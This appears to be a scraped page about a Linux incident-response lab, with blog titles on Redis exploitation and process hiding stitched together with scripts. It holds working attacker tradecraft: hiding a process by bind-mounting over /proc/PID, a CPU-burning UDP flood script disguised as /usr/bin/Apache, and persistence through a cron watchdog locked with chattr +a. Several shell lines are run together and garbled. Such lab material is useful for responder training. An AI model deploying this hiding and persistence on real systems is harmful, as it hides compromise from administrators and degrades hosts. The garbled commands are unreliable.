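# Kill every process whose command line contains "Apache".
# pgrep -f matches against the full command line, as the original
# ps | grep chain did, and never lists itself, so no "grep -v grep" is needed.
# xargs -r skips kill when nothing matched, instead of running "kill -9"
# with no PID.
# Incident-response note: the start.sh watchdog shown later on this page is run
# by cron every minute and relaunches /usr/bin/Apache. Remove that crontab
# entry before killing, otherwise the process comes back.
pgrep -f Apache | xargs -r kill -9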
redis未授权访问漏洞利用总结——linux篇 - 夜尽终会天明 - 博客园
linuxStack/进程隐藏技术的攻与防-攻篇.md at master · g0dA/linuxStack · GitHub
nohup /usr/bin/redis-server /etc/redis.conf >/dev/null 2>&1 &process="redis"PID=$(ps -ef | grep $process | grep -v grep | awk '{print $2}')mkdir .hidden >/dev/null 2>&1 &mount -o bind .hidden "/proc/${PID}"nohup /usr/bin/redis-server /etc/redis.conf >/dev/null 2>&1 &PID=$(ps -ef | grep $process | grep -v grep | awk '{print $2}')mkdir .hidden >/dev/null 2>&1 &mount -o bind .hidden "/proc/${PID}"if [ -n "$PID" ]; thenecho "OK"elseecho "NO"fi
# Load generator used as the lab's stand-in "malicious" process.
# NOTE(review): indentation was lost on the source page; the nesting below is a
# reconstruction. Confirm it against the original file (presumably Apache.py,
# which the page later builds with pyinstaller).
import multiprocessing
import socket


def send_traffic(ip, port):
    """Send empty UDP datagrams to (ip, port) forever, with a busy loop between sends.

    What a responder would observe on the host: one such worker per CPU core,
    sustained CPU load from the summation loop, and outbound UDP traffic to the
    address passed in (1.2.3.4:6666 in this listing).
    """
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    # connect() on a UDP socket only fixes the default destination for send().
    sock.connect((ip, port))
    while True:
        sock.send(b"")
        # CPU-bound filler work; the result is never used.
        sum = 0
        for i in range(10000000):
            sum += i


# One worker process per logical CPU reported by the OS.
m = multiprocessing.cpu_count()
for i in range(m):
    multiprocessing.Process(target=send_traffic, args=('1.2.3.4', 6666)).start()
pyinstaller -F Apache.py # 生成linux可执行程序mv dist/Apache /usr/bin/vim /etc/rc.local.d/start.sh#!/bin/bashPID=$(ps -ef | grep "Apache" | grep -v "grep" | awk '{print $2}')if [ -n "$PID" ]; thenecho "ok"elsenohup /usr/bin/Apache >/dev/null 2>&1 &ficrontab -e* * * * * /etc/rc.local.d/start.shchattr +a /usr/bin/Apache /etc/rc.local.d/start.sh
vim /etc/rsyslog.d/50-default.conf
将 cron 一行前的注释符(#)去除,以启用 cron 日志记录。
